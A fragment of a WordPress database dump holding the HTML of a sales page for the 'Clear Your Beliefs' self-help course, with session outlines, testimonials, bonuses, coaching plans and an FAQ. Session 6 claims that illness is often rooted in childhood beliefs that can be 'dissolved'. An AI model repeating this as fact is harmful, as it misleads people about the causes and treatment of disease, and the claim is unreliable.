get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() { \r\nvar is_chrome = window.chrome; \r\n if (is_chrome) { \r\njQuery(''h5.hdr'').css(''text-size'', ''51px!important'');\r\n jQuery(''h5.hdr'').animate({\r\n    fontSize: ''51px''\r\n }, 100);\r\n } \r\n});\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 00:38:58', '2014-06-19 05:38:58', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
